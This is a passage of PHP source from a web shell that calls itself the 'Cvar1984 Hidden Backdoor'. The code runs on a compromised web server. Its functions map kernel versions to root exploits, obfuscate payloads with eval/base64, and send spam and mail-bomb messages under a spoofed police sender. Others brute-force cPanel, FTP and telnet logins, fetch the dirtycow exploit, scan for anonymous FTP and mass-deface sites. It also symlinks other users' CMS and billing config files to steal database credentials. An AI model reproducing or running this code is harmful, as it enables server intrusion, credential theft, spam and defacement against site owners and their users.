1485. '2.4.10' => 'w00t,brk,uselib24,loginx',
1486. '2.4.9' => 'ptrace24,uselib24',
1487. '2.4.' => 'kmdx,remap,pwned,ptrace_kmod,ong_bak',
1488. '2.2.25' => 'mremap_pte',
1489. '2.2.24' => 'ptrace',
1490. '2.2.' => 'rip,ptrace'
1491. );
1492. foreach($r00t_db as $kern => $exp) {
1493. if(strstr($kernel, $kern)) {
1494. return $exp;
1495. } else {
1496. $exp = '<font color="red">Not found.</font>';
1497. return $exp;
1498. }
1499. }
1500. }
1501. function php_ende_ui() {
1502. echo "
1503. <div id=result><center><h2>PHP ENCODE/DECODE</h2></center><hr><form method='post'>
1504. <table class=tbl>
1505. <tr><td>
1506. Method : <select name='typed' style='color:yellow;background-color:black;border:1px solid#666;'>
1507. <option>Encode</option>
1508. <option>Decode</decode>
1509. </select>
1510. TYPE : <select name='typenc' style='color:yellow;background-color:black;border:1px solid #666;'>
1511. <option>GZINFLATE</option>
1512. <option>GZUNCOMPRESS</option>
1513. <option>STR_ROT13</option>
1514. </tr></td><tr>
1515. <td><textarea spellcheck='false' class=textarea_edit cols='80' rows='25' name='php_content'></textarea></tr></td></table><hr>
1516. <input class='input_big' type='submit' value='O'><br><hr><br><br></form></div>";
1517. }
1518. function php_ende_bg() {
1519. $meth_d = $_POST['typed'];
1520. $typ_d = $_POST['typenc'];
1521. $c_ntent = $_POST['php_content'];
1522. $c_ntent = $c_ntent;
1523. switch($meth_d) {
1524. case "Encode":
1525. switch($typ_d) {
1526. case "GZINFLATE":
1527. $res_t = base64_encode(gzdeflate(trim(stripslashes($c_ntent . ' '), '<?php,
1528. ?>'), 9));
1529. $res_t = "<?php
1530. eval(gzinflate(base64_decode(\"$res_t\")));
1531. ?>";
1532. break;
1533. case "GZUNCOMPRESS":
1534. $res_t = base64_encode(gzcompress(trim(stripslashes($c_ntent . ' '), '<?php,
1535. ?>'), 9));
1536. $res_t = "<?php eval(gzuncompress(base64_decode(\"$res_t\")));
1537. ?>";
1538. break;
1539. case "STR_ROT13":
1540. $res_t = trim(stripslashes($c_ntent . ' '), '<?php,
1541. ?>');
1542. $res_t = base64_encode(str_rot13($res_t));
1543. $res_t = "<?php eval(str_rot13(base64_decode(\"$res_t\")));
1544. ?>";
1545. break;
1546. }
1547. break;
1548. case "Decode":
1549. switch($typ_d) {
1550. case "GZINFLATE":
1551. $res_t = gzinflate(base64_decode($c_ntent));
1552. break;
1553. case "GZUNCOMPRESS":
1554. $res_t = gzuncompress(base64_decode($c_ntent));
1555. break;
1556. case "STR_ROT13":
1557. $res_t = str_rot13(base64_decode($c_ntent));
1558. break;
1559. }
1560. break;
1561. }
1562. echo "<div id=result><center><h2>Cvar1984 Hidden Backdoor</h2>
1563. <hr><textarea spellcheck='false' class=textarea_edit cols='80' rows='25'>" . htmlspecialchars($res_t) . "</textarea></center></div>";
1564. }
1565. function massmailer_ui() {
1566. echo "<div id=result><center><h2>MASS MAILER & MAIL BOMBER</h2><hr>
1567. <table class=tbl width=40 style='col-width:40'>
1568. <td><table class=tbl><tr style='float:left;'>
1569. <td><font color=yellow size=4>Mass Mail</font></td></tr>
1570. <form method='POST'><tr style='float:left;'>
1571. <td> FROM : </td>
1572. <td><input name='from' size=40 value='admin'></td></tr><tr style='float:left;'>
1573. <td>TO : </td><td><input size=40 name='to_mail' value='gedzsarjuncomuniti@gmail,gedzsarjuncomuniti@yahoo.co.id'></td></tr>
1574. <tr style='float:left;'>
1575. <td>Subject : </td><td><input size=40 name='subject_mail' value='Testing,'></td></tr>
1576. <tr style='float:left;'>
1577. <td><textarea spellcheck='false' class=textarea_edit cols='34' rows='10' name='mail_content'>I'm doing
1578. massmail :p</textarea></td>
1579. <td><input class='input_big' type='submit' value=O></td></tr></form></table></td>
1580. <form method='post'>
1581. <td> <table class='tbl'>
1582. <td><font color=yellow size=4>Mail Bomber</font></td></tr>
1583. <tr style='float:left;'><td>TO : </td>
1584. <td><input size='40' name='bomb_to' value='gedzsarjuncomuniti@gmail.com,gedzsarjuncomuniti@yahoo.com'></td></tr><tr style='float:left;'>
1585. <td>Subject : </td>
1586. <td><input size='40' name='bomb_subject' value='Bombing with messages'></td></tr><tr style='float:left;'>
1587. <td>No. of times</td><td><input size='40' name='bomb_no' value='100'></td></tr><tr style='float:left;'>
1588. <td><textarea spellcheck='false' class=textarea_edit cols='34' rows='10' name='bmail_content' required>I'm doing E-Mail Bombing :p</textarea></td>
1589. <td><input class='input_big' type='submit' value='O'></td></tr></form></table>
1590. </td></tr></table>";
1591. }
1592. function massmailer_bg() {
1593. $from = $_POST['from'];
1594. $to = $_POST['to_mail'];
1595. $subject = $_POST['subject_mail'];
1596. $message = $_POST['mail_content'];
1597. if(function_exists('mail')) {
1598. if(mail($to, $subject, $message, "From:$from")) {
1599. echo "<div id=result><center><h2>MAIL
1600. SPAMER</h2><hr /><br /><br /><font color=yellow
1601. size=4>Successfully Mails Send...</font><br><br><hr><br><br>";
1602. } else {
1603. echo "<div id=result><center><h2>MAIL
1604. SPAMING</h2><hr /><br /><br /><font color=red
1605. size=4>Sorry, failed to Mails Sending... :(</font><br><br><hr><br><br>";
1606. }
1607. } else {
1608. echo "<div id=result><center><h2>MAIL SPAMING</h2><hr /><br /><br /><font color=red
1609. size=4>Sorry, failed to Mails Sending... :(</font><br
1610. /><br /><hr /><br /><br />";
1611. }
1612. }
1613. function mailbomb_bg() {
1614. $rand = rand(0, 9999999);
1615. $to = $_POST['bomb_to'];
1616. $from = "Polisi";
1617. $subject = $_POST['bomb_subject'] . " ID " . $rand;
1618. $times = $_POST['bomb_no'];
1619. $content = $_POST['bmail_content'];
1620. if($times == '') {
1621. $times = 1000;
1622. }
1623. while($times--) {
1624. if(function_exists('mail')) {
1625. if(mail($to, $subject, $message, "From:$from")) {
1626. echo "<div
1627. id=result><center><h2>MAIL SPAMING</h2><hr><br><br><font color=yellow size=4>Successfully
1628. Mails Bombed... :p</font><br><br><hr><br><br>";
1629. } else {
1630. echo "<div
1631. id=result><center><h2>MAIL SPAMING</h2><hr><br><br><font color=red size=4>Sorry, failed to
1632. Mails Bombing... :(</font><br><br><hr><br><br>";
1633. }
1634. } else {
1635. echo "<div id=result><center><h2>MAIL
1636. SPAMING</h2><hr /><br /><br /><font color=red
1637. size=4>Sorry, failed to Mails Bombing... :(</font><br><br><hr><br><br>";
1638. }
1639. }
1640. }
1641. function cpanel_check($host, $user, $pass, $timeout) {
1642. set_time_limit(0);
1643. global $cpanel_port;
1644. $ch = curl_init();
1645. curl_setopt($ch, CURLOPT_URL, "http://$host:" . $cpanel_port);
1646. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
1647. curl_setopt($ch, CURLOPT_HTTPAUTH, CURLAUTH_BASIC);
1648. curl_setopt($ch, CURLOPT_USERPWD, "$user:$pass");
1649. curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
1650. curl_setopt($ch, CURLOPT_FAILONERROR, 1);
1651. $data = curl_exec($ch);
1652. if(curl_errno($ch) == 28) {
1653. print "<b><font color=orange>Error :</font>
1654. <font color=red>Connection Timeout. Please Check The Target Hostname
1655. .</font></b>";
1656. exit;
1657. } else if(curl_errno($ch) == 0) {
1658. print "<b><font face=\"Iceland\"
1659. style=\"font-size: 9pt\"
1660. color=\"orange\">[~]</font></b><font
1661. face=\"Iceland\" style=\"font-size:
1662. 9pt\"><b><font color=\"yellow\">
1663. Cracking Success With Username &quot;</font><font
1664. color=\"#FF0000\">$user</font><font
1665. color=\"#008000\">\" and Password
1666. \"</font><font
1667. color=\"#FF0000\">$pass</font><font
1668. color=\"#008000\">\"</font></b><br><br>";
1669. }
1670. curl_close($ch);
1671. }
1672. function cpanel_crack() {
1673. set_time_limit(0);
1674. global $os;
1675. echo "<div id=result>";
1676. $cpanel_port = "2082";
1677. $connect_timeout = 5;
1678. if(!isset($_POST['username']) && !isset($_POST['password']) && !isset($_POST['target']) && !isset($_POST['cracktype'])) {
1679. ?>
1680. <center>
1681. <form method=post>
1682. <table class=tbl>
1683. <tr>
1684. <td align=center colspan=2>Target : <input type=text name="server" value="localhost"
1685. class=sbox></td>
1686. </tr>
1687. <tr>
1688. <td align=center>User names</td><td
1689. align=center>Password</td>
1690. </tr>
1691. <tr>
1692. <td align=center><textarea spellcheck='false'
1693. class=textarea_edit name=username rows=25 cols=35 class=box><?php
1694. if($os != "win") {
1695. if(@file('/etc/passwd')) {
1696. $users = file('/etc/passwd');
1697. foreach($users as $user) {
1698. $user = explode(':', $user);
1699. echo $user[0] . "\n";
1700. }
1701. } else {
1702. $temp = "";
1703. $val1 = 0;
1704. $val2 = 1000;
1705. for(; $val1 <= $val2; $val1++) {
1706. $uid = @posix_getpwuid($val1);
1707. if($uid)
1708. $temp .= join(':', $uid) . "\n";
1709. }
1710. $temp = trim($temp);
1711. if($file5 = fopen("test.txt", "w")) {
1712. fputs($file5, $temp);
1713. fclose($file5);
1714. $file = fopen("test.txt", "r");
1715. while(!feof($file)) {
1716. $s = fgets($file);
1717. $matches = array();
1718. $t = preg_match('/\/(.*?)\:\//s', $s, $matches);
1719. $matches = str_replace("home/", "", $matches[1]);
1720. if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named")
1721. continue;
1722. echo $matches;
1723. }
1724. fclose($file);
1725. }
1726. }
1727. }
1728. ?></textarea></td><td align=center><textarea
1729. spellcheck='false' class=textarea_edit name=password rows=25 cols=35
1730. class=box></textarea></td>
1731. </tr>
1732. <tr>
1733. <td align=center colspan=2>Guess options :
1734. <label><input
1735. name="cracktype" type="radio" value="cpanel"
1736. checked> Cpanel(2082)</label><label><input
1737. name="cracktype" type="radio"
1738. value="ftp">
1739. Ftp(21)</label><label><input name="cracktype"
1740. type="radio" value="telnet">
1741. Telnet(23)</label></td>
1742. </tr>
1743. <tr>
1744. <td align=center colspan=2>Timeout delay : <input
1745. type="text" name="delay" value=5
1746. class=sbox></td>
1747. </tr>
1748. <tr>
1749. <td align=center colspan=2><input type="submit"
1750. value="O" class=but></td>
1751. </tr>
1752. </table>
1753. </form>
1754. </center>
1755. <?php
1756. } else {
1757. if(empty($_POST['username']) || empty($_POST['password']))
1758. echo "<center>Please Enter The Users or Password List</center>";
1759. else {
1760. $userlist = explode("\n", $_POST['username']);
1761. $passlist = explode("\n", $_POST['password']);
1762. if($_POST['cracktype'] == "ftp") {
1763. foreach($userlist as $user) {
1764. $pureuser = trim($user);
1765. foreach($passlist as $password) {
1766. $purepass = trim($password);
1767. ftp_check($_POST['target'], $pureuser, $purepass, $connect_timeout);
1768. }
1769. }
1770. }
1771. if($_POST['cracktype'] == "cpanel" || $_POST['cracktype'] == "telnet") {
1772. if($cracktype == "telnet") {
1773. $cpanel_port = "23";
1774. } else
1775. $cpanel_port = "2082";
1776. foreach($userlist as $user) {
1777. $pureuser = trim($user);
1778. echo "<b><font face=Iceland style=\"font-size:
1779. 9pt\" color=#008000> [ - ] </font><font face=Iceland
1780. style=\"font-size: 9pt\" color=#FF0800>
1781. Processing user $pureuser
1782. ...</font></b><br><br>";
1783. foreach($passlist as $password) {
1784. $purepass = trim($password);
1785. cpanel_check($_POST['target'], $pureuser, $purepass, $connect_timeout);
1786. }
1787. }
1788. }
1789. }
1790. }
1791. echo "</div>";
1792. }
1793. function get_users() {
1794. $userz = array();
1795. $user = file("/etc/passwd");
1796. foreach($user as $userx => $usersz) {
1797. $userct = explode(":", $usersz);
1798. array_push($userz, $userct[0]);
1799. }
1800. if(!$user) {
1801. if($opd = opendir("/home/")) {
1802. while(($file = readdir($opd)) !== false) {
1803. array_push($userz, $file);
1804. }
1805. }
1806. closedir($opd);
1807. }
1808. $userz = implode(', ', $userz);
1809. return $userz;
1810. }
1811. function exploit_details() {
1812. global $os;
1813. echo "<div id=result style='color:yellow;'><center>
1814. <h2>Exploit Server Details</h2><hr /><br
1815. /><br /><table class=table
1816. style='color:yellow;text-align:center'><tr><td>
1817. OS: <a style='color:7171C6;text-decoration:none;' target=_blank
1818. href='http://www.exploit-db.com/search/?action=search&filter_page=1&filter_description=" . php_uname(s) . "'>" . php_uname(s) . "</td></tr>
1819. <tr><td>PHP Version : <a
1820. style='color:7171C6;text-decoration:none;' target=_blank
1821. href='?phpinfo'>" . phpversion() . ".</td></tr>
1822. <tr><td>Kernel Release : <font
1823. color=7171C6>" . php_uname(r) . "</font></td></tr>
1824. <tr><td>Kernel Version : <font
1825. color=7171C6>" . php_uname(v) . "</font></td></td>
1826. <tr><td>Machine : <font
1827. color=7171C6>" . php_uname(m) . "</font></td</tr>
1828. <tr><td>Server Software : <font
1829. color=7171C6>" . $_SERVER['SERVER_SOFTWARE'] . "</font></td</tr><tr>";
1830. if(function_exists('apache_get_modules')) {
1831. echo "<tr><td style='text-align:left;'>Loaded Apache
1832. modules : <br /><br /><font color=7171C6>";
1833. echo implode(', ', apache_get_modules());
1834. echo "</font></tr></td>";
1835. }
1836. if($os == 'win') {
1837. echo "<tr><td style='text-align:left;'>Account
1838. Setting : <font color=7171C6><pre>" . cmd('net
1839. accounts') . "</pre></td></tr>
1840. <tr><td style='text-align:left'>User Accounts :
1841. <font color=7171C6><pre>" . cmd('net
1842. user') . "</pre></td></tr>
1843. ";
1844. }
1845. if($os == 'nix') {
1846. echo "<tr><td style='text-align:left'>Distro :
1847. <font color=7171C6><pre>" . cmd('cat
1848. /etc/*-release') . "</pre></font></td></tr>
1849. <tr><td style='text-align:left'>Distr name :
1850. <font color=7171C6><pre>" . cmd('cat
1851. /etc/issue.net') . "</pre></font></td></tr>
1852. <tr><td style='text-align:left'>GCC : <font
1853. color=7171C6><pre>" . cmd('whereis
1854. gcc') . "</pre></td></tr>
1855. <tr><td style='text-align:left'>PERL : <font
1856. color=7171C6><pre>" . cmd('whereis
1857. perl') . "</pre></td></tr>
1858. <tr><td style='text-align:left'>PYTHON :
1859. <font
1860. color=7171C6><pre>" . cmd('whereis
1861. python') . "</pre></td></tr>
1862. <tr><td style='text-align:left'>JAVA : <font
1863. color=7171C6><pre>" . cmd('whereis
1864. java') . "</pre></td></tr>
1865. <tr><td style='text-align:left'>APACHE :
1866. <font
1867. color=7171C6><pre>" . cmd('whereis
1868. apache') . "</pre></td></tr>
1869. <tr><td style='text-align:left;'>CPU : <br
1870. /><br /><pre><font color=7171C6>" . cmd('cat
1871. /proc/cpuinfo') . "</font></pre></td></tr>
1872. <tr><td style='text-align:left'>RAM : <font
1873. color=7171C6><pre>" . cmd('free
1874. -m') . "</pre></td></tr>
1875. <tr><td style='text-align:left'> User Limits :
1876. <br /><br /><font
1877. color=7171C6><pre>" . cmd('ulimit
1878. -a') . "</pre></td></tr>";
1879. $useful = array(
1880. 'gcc',
1881. 'lcc',
1882. 'cc',
1883. 'ld',
1884. 'make',
1885. 'php',
1886. 'perl',
1887. 'python',
1888. 'ruby',
1889. 'tar',
1890. 'gzip',
1891. 'bzip',
1892. 'bzip2',
1893. 'nc',
1894. 'locate',
1895. 'suidperl'
1896. );
1897. $uze = array();
1898. foreach($useful as $uzeful) {
1899. if(cmd("which $uzeful")) {
1900. $uze[] = $uzeful;
1901. }
1902. }
1903. echo "<tr><td
1904. style='text-align:left'>Useful
1905. : <br /><font color=7171C6><pre>";
1906. echo implode(', ', $uze);
1907. echo "</pre></td></tr>";
1908. $downloaders = array(
1909. 'wget',
1910. 'fetch',
1911. 'lynx',
1912. 'links',
1913. 'curl',
1914. 'get',
1915. 'lwp-mirror'
1916. );
1917. $uze = array();
1918. foreach($downloaders as $downloader) {
1919. if(cmd("which $downloader")) {
1920. $uze[] = $downloader;
1921. }
1922. }
1923. echo "<tr><td
1924. style='text-align:left'>Downloaders : <br /><font
1925. color=7171C6><pre>";
1926. echo implode(', ', $uze);
1927. echo "</pre></td></tr>";
1928. echo "<tr><td style='text-align:left'>Users
1929. : <br /><font
1930. color=7171C6><pre>" . wordwrap(get_users()) . "</pre</font>></td></tr>
1931. <tr><td style='text-align:left'>Hosts :
1932. <br /><font color=7171C6><pre>" . cmd('cat
1933. /etc/hosts') . "</pre></font></td></tr>";
1934. }
1935. echo "</table><br /><br /><hr /><br
1936. /><br />";
1937. }
1938. function remote_file_check_ui() {
1939. echo "<div id=result><center><h2>Remote File
1940. Check</h2><hr /><br /><br />
1941. <table class=tbl><form
1942. method='POST'><tr><td>URL : <input size=50
1943. name='rem_web'
1944. value='http://www.nasa.gov/filemanager/'></td></tr>
1945. <tr><td><font color=red>Input File's Names in
1946. TextArea</font></tr></td><tr><td><textarea
1947. spellcheck='false' class='textarea_edit' cols=50 rows=30
1948. name='tryzzz'>
1949. x.php
1950. .env
1951. robots.txt
1952. .htacces
1953. nekopoi.mp4
1954. c99.php
1955. r57.php
1956. B374k.php
1957. </textarea></td></tr>
1958. <tr><td><br>
1959. <input type='submit' value='O' class='input_big'>
1960. <br><br></td></tr></form></table><br ><br><hr><br><br>";
1961. }
1962. function remote_file_check_bg() {
1963. set_time_limit(0);
1964. $rtr = array();
1965. echo "<div id=result><center><h2>Scanner
1966. Report</h2><hr /><br /><br /><table
1967. class=tbl>";
1968. $webz = $_POST['rem_web'];
1969. $uri_in = $_POST['tryzzz'];
1970. $r_xuri = trim($uri_in);
1971. $r_xuri = explode("\n", $r_xuri);
1972. foreach($r_xuri as $rty) {
1973. $urlzzx = $webz . $rty;
1974. if(function_exists('curl_init')) {
1975. echo "<tr><td
1976. style='text-align:left'><font
1977. color=orange>Checking : </font> <font color=7171C6> $urlzzx
1978. </font></td>";
1979. $ch = curl_init($urlzzx);
1980. curl_setopt($ch, CURLOPT_NOBODY, true);
1981. curl_exec($ch);
1982. $status_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
1983. curl_close($ch);
1984. if($status_code == 200) {
1985. echo "<td style='text-align:left'><font
1986. color=yellow> Found....</font></td></tr>";
1987. } else {
1988. echo "<td style='text-align:left'><font
1989. color=red>Not Found...</font></td></tr>";
1990. }
1991. } else {
1992. echo "<font color=red>cURL Not Found
1993. </font>";
1994. break;
1995. }
1996. }
1997. echo "</table><br /><br /><hr /><br
1998. /><br /></div>";
1999. }
2000. function remote_download_ui() {
2001. echo "<div id=result><center><h2>Remote File
2002. Download</h2><hr><br><br><table class=tbl><form method='GET'><input type=hidden name='path'
2003. value=" . getcwd() . "><tr><td><select
2004. style='color:yellow; background-color:black; border:1px solid #666;'
2005. name='type_r_down'><option>WGET</option><option>cURL</option></select></td></tr>
2006. <tr><td>URL <input size=50 name='rurlfile'
2007. value='https://raw.githubusercontent.com/FireFart/dirtycow/master/dirty.c'></td></tr>
2008. <tr><td><input type='submit' class='input_big' value='O' /></td></tr></form></table><br><br><hr><br><br></div>";
2009. }
2010. function remote_download_bg() {
2011. chdir($_GET['path']);
2012. global $os;
2013. $opt = $_GET['type_r_down'];
2014. $rt_ffile = $_GET['rurlfile'];
2015. $name = basename($rt_ffile);
2016. echo "<div id=result>";
2017. switch($opt) {
2018. case "WGET":
2019. if($os != 'win') {
2020. cmd("wget $rt_ffile");
2021. alert("Downloaded Successfully...");
2022. } else {
2023. alert("Its Windows OS... WGET is not available");
2024. }
2025. break;
2026. case "cURL":
2027. if(function_exists('curl_init')) {
2028. $ch = curl_init($rt_ffile);
2029. curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
2030. $data = curl_exec($ch);
2031. curl_close($ch);
2032. file_put_contents($name, $data);
2033. alert("Download succeeded");
2034. } else {
2035. alert("cURL Not Available");
2036. }
2037. break;
2038. }
2039. echo "</div>";
2040. }
2041. function hex_encode_ui() {
2042. if(isset($_REQUEST['hexinp']) && isset($_REQUEST['tyxxx'])) {
2043. $tyx = $_POST['tyxxx'];
2044. $rezultzz = $_POST['hexinp'];
2045. switch($tyx) {
2046. case "Encode":
2047. $rzul = PREG_REPLACE("'(.)'e", "dechex(ord('\\1'))", $rezultzz);
2048. echo "<div
2049. id=result><center><h2>HEXADECIMAL ENCODER</h2><hr><br><br>
2050. <textarea class='textarea_edit' spellcheck=false
2051. cols=60
2052. rows=10>$rzul</textarea>
2053. <br /><br /><form
2054. method='POST'><select style='color:yellow; background-color:black;
2055. border:1px solid #666;'
2056. name='tyxxx'><option>Encode</option><option>Decode</option></select>
2057. Input : <input name='hexinp' size=50 value='input
2058. here'><input type=submit value='O' /><br><br><hr><br><br></div>";
2059. break;
2060. case "Decode":
2061. $rzul = PREG_REPLACE("'([\S,\d]{2})'e", "chr(hexdec('\\1'))", $rezultzz);
2062. echo "<div
2063. id=result><center><h2>HEXADECIMAL ENCODER</h2><hr><br><br>
2064. <textarea class='textarea_edit' spellcheck=false
2065. cols=60
2066. rows=10>$rzul</textarea>
2067. <br /><br /><form
2068. method='POST'><select style='color:yellow; background-color:black;
2069. border:1px solid #666;'
2070. name='tyxxx'><option>Encode</option><option>Decode</option></select>
2071. Input : <input name='hexinp' size=50 value='input
2072. here'><input type=submit value='O' /><br><br><hr><br><br></div>";
2073. break;
2074. }
2075. } else {
2076. echo "<div
2077. id=result><center><h2>HEXADECIMAL
2078. ENCODER</h2><hr /><br /><br />
2079. <textarea class='textarea_edit' spellcheck=false cols=60
2080. rows=10>Here visible Your Result</textarea>
2081. <br /><br /><form method='POST'><select
2082. style='color:yellow; background-color:black; border:1px solid #666;'
2083. name='tyxxx'><option>Encode</option><option>Decode</option></select>
2084. Input : <input name='hexinp' size=50 value='input
2085. here'><input type=submit value='O' /><br
2086. /><br /><hr /><br /><br /></div>";
2087. }
2088. }
2089. function killme() {
2090. global $self;
2091. echo "<div id=result><center><h2>Good Bye
2092. Dear</h2><hr />Where Are U Going? :( <br><br><br><hr><br><br>";
2093. $me = basename($self);
2094. unlink($me);
2095. }
2096. function ftp_anonymous_ui() {
2097. echo "<div id='result'><center><h2>Anonymous FTP Scanner</h2><hr></center>
2098. <table class=tbl><form method='GET'><tr>
2099. <td><textarea name='ftp_anonz' cols=40 rows=25 class='textarea_edit' required>
2100. 127.0.0.1
2101. ftp.google.com
2102. ftp.r00t.com
2103. ftp.nekopoi.org</textarea></td></tr>
2104. <tr><td><input class='input_big' type='submit' value='O'></td></tr></form></table><br><br><hr><br><br>";
2105. }
2106. function ftp_anonymous_bg() {
2107. echo "<div
2108. id=result><center><h2>Result</h2></center><hr
2109. /><br /><br /><table class=table>";
2110. $ftp_list = $_GET['ftp_anonz'];
2111. $xftpl = trim($ftp_list);
2112. $xftpl = explode("\n", $xftpl);
2113. foreach($xftpl as $xftp) {
2114. $xftp = str_replace("ftp://", "", $xftp);
2115. $conn_ftp = ftp_connect($xftp);
2116. $success = ftp_login($conn_ftp, "anonymous", "");
2117. if($success) {
2118. echo "<tr><td><font
2119. color=7171C6>$xftp</font></td><td><font
2120. color=yellow>Successfull</font></td></tr>";
2121. } else {
2122. echo "<tr><td><font
2123. color=7171C6>$xftp</font></td><td><font
2124. color=red>Failed</font></td></tr>";
2125. }
2126. }
2127. echo "</table><br /><br /><hr /><br
2128. /><br />";
2129. }
2130. function mass_deface_ui() {
2131. echo "<div id=result><center><h2>Mass
2132. Deface</h2><hr /><br /><br /><table
2133. class=tbl><form method='GET'><input name='mm_path'
2134. type='hidden'
2135. value=" . $_GET['path'] . "><tr><td>Name
2136. : <input size=40 name='mass_name'></td></tr>
2137. <tr><td><textarea name='mass_cont' cols=80 rows=25
2138. class='textarea_edit'></textarea></td></tr><tr><td><input
2139. class='input_big' type=submit value='O'
2140. /></td></tr></form></table><br /><br
2141. /><hr /><br /><br /></div>";
2142. }
2143. function mass_deface_bg() {
2144. global $sep;
2145. $d_path = $_GET['mm_path'];
2146. chdir($d_path);
2147. $d_file = $_GET['mass_name'];
2148. $d_conten = $_GET['mass_cont'];
2149. if(is_dir($d_path)) {
2150. chdir($d_path);
2151. $d_dirs = array();
2152. if($handle = opendir($d_path)) {
2153. while(($item = readdir($handle)) !== FALSE) {
2154. if($item == ".") {
2155. continue;
2156. }
2157. if($item == "..") {
2158. continue;
2159. }
2160. if(is_dir($item)) {
2161. array_push($d_dirs, $item);
2162. }
2163. }
2164. }
2165. }
2166. echo "<div
2167. id=result><center><h2>Result</h2></center><hr
2168. /><br /><br /><table class=tbl>";
2169. foreach($d_dirs as $d_dir) {
2170. $xd_path = getcwd() . "$sep$d_dir$sep$d_file";
2171. if(is_writable($d_dir)) {
2172. $handle = fopen($xd_path, "wb");
2173. if($handle) {
2174. fwrite($handle, $d_conten);
2175. }
2176. }
2177. echo "<tr><td><font
2178. color=yellow>$xd_path</font></td></tr>";
2179. }
2180. echo "</table><br /><br /><hr /><br
2181. /><br /></div>";
2182. }
2183. function symlinkg($usernamexx, $domainxx) {
2184. symlink('/home/' . $usernamexx . '/public_html/vb/includes/config.php', 'Cvar1984/' . $domainxx . '
2185. =>vBulletin1.txt');
2186. symlink('/home/' . $usernamexx . '/public_html/includes/config.php', 'Cvar1984/' . $domainxx . '
2187. =>vBulletin2.txt');
2188. symlink('/home/' . $usernamexx . '/public_html/forum/includes/config.php', 'Cvar1984/' . $domainxx . '
2189. =>vBulletin3.txt');
2190. symlink('/home/' . $usernamexx . '/public_html/cc/includes/config.php', 'Cvar1984/' . $domainxx . '
2191. =>vBulletin4.txt');
2192. symlink('/home/' . $usernamexx . '/public_html/inc/config.php', 'Cvar1984/' . $domainxx . '
2193. =>mybb.txt');
2194. symlink('/home/' . $usernamexx . '/public_html/config.php', 'Cvar1984/' . $domainxx . '
2195. =>Phpbb1.txt');
2196. symlink('/home/' . $usernamexx . '/public_html/forum/includes/config.php', 'Cvar1984/' . $domainxx . '
2197. =>Phpbb2.txt');
2198. symlink('/home/' . $usernamexx . '/public_html/wp-config.php', 'Cvar1984/' . $domainxx . '
2199. =>Wordpress1.txt');
2200. symlink('/home/' . $usernamexx . '/public_html/blog/wp-config.php', 'Cvar1984/' . $domainxx . '
2201. =>Wordpress2.txt');
2202. symlink('/home/' . $usernamexx . '/public_html/configuration.php', 'Cvar1984/' . $domainxx . '
2203. =>Joomla1.txt');
2204. symlink('/home/' . $usernamexx . '/public_html/blog/configuration.php', 'Cvar1984/' . $domainxx . '
2205. =>Joomla2.txt');
2206. symlink('/home/' . $usernamexx . '/public_html/joomla/configuration.php', 'Cvar1984/' . $domainxx . '
2207. =>Joomla3.txt');
2208. symlink('/home/' . $usernamexx . '/public_html/whm/configuration.php', 'Cvar1984/' . $domainxx . '
2209. =>Whm1.txt');
2210. symlink('/home/' . $usernamexx . '/public_html/whmc/configuration.php', 'Cvar1984/' . $domainxx . '
2211. =>Whm2.txt');
2212. symlink('/home/' . $usernamexx . '/public_html/support/configuration.php', 'Cvar1984/' . $domainxx . '
2213. =>Whm3.txt');
2214. symlink('/home/' . $usernamexx . '/public_html/client/configuration.php', 'Cvar1984/' . $domainxx . '
2215. =>Whm4.txt');
2216. symlink('/home/' . $usernamexx . '/public_html/billings/configuration.php', 'Cvar1984/' . $domainxx . '
2217. =>Whm5.txt');
2218. symlink('/home/' . $usernamexx . '/public_html/billing/configuration.php', 'Cvar1984/' . $domainxx . '
2219. =>Whm6.txt');
2220. symlink('/home/' . $usernamexx . '/public_html/clients/configuration.php', 'Cvar1984/' . $domainxx . '
2221. =>Whm7.txt');
2222. symlink('/home/' . $usernamexx . '/public_html/whmcs/configuration.php', 'Cvar1984/' . $domainxx . '
2223. =>Whm8.txt');
2224. symlink('/home/' . $usernamexx . '/public_html/order/configuration.php', 'Cvar1984/' . $domainxx . '
2225. =>Whm9.txt');
2226. symlink('/home/' . $usernamexx . '/public_html/admin/conf.php', 'Cvar1984/' . $domainxx . '
2227. =>5.txt');
2228. symlink('/home/' . $usernamexx . '/public_html/admin/config.php', 'Cvar1984/' . $domainxx . '
2229. =>4.txt');
2230. symlink('/home/' . $usernamexx . '/public_html/conf_global.php', 'Cvar1984/' . $domainxx . '
2231. =>invisio.txt');
2232. symlink('/home/' . $usernamexx . '/public_html/include/db.php', 'Cvar1984/' . $domainxx . '
2233. =>7.txt');
2234. symlink('/home/' . $usernamexx . '/public_html/connect.php', 'Cvar1984/' . $domainxx . '
2235. =>8.txt');
2236. symlink('/home/' . $usernamexx . '/public_html/mk_conf.php', 'Cvar1984/' . $domainxx . '
2237. =>mk-portale1.txt');
2238. symlink('/home/' . $usernamexx . '/public_html/include/config.php', 'Cvar1984/' . $domainxx . '
2239. =>12.txt');
2240. symlink('/home/' . $usernamexx . '/public_html/settings.php', 'Cvar1984/' . $domainxx . '
2241. =>Smf.txt');
2242. symlink('/home/' . $usernamexx . '/public_html/includes/functions.php', 'Cvar1984/' . $domainxx . '
2243. =>phpbb3.txt');
2244. symlink('/home/' . $usernamexx . '/public_html/include/db.php', 'Cvar1984/' . $domainxx . '
2245. =>infinity.txt');
2246. }
2247. function config_grabber_bg() {
2248. global $sym_htaccess, $sym_php_ini;
2249. mkdir('Cvar1984', 0777);
2250. symlink("/", "Cvar1984/root");
2251. $htaccess = fopen('Cvar1984/.htaccess', 'wb');
2252. fwrite($htaccess, $sym_htaccess);
2253. $php_ini_x = fopen('Cvar1984/php.ini', 'wb');
2254. fwrite($php_ini_x, $sym_php_ini);
2255. $usr = explode("\n", $_POST['user_z_list']);
2256. foreach($usr as $uzer) {
2257. $u_er = trim($uzer);
2258. symlinggg($u_er);
2259. }
2260. echo "<script>window.open('Cvar1984/',
2261. '_blank');</script>";
2262. alert('Config Grab compted. Check configs in direcory Cvar1984');
2263. }
2264. if(isset($_POST['user_z_list'])) {
2265. config_grabber_bg();
2266. }
2267. function config_grabber_ui() {
2268. if(file('/etc/passwd')) {
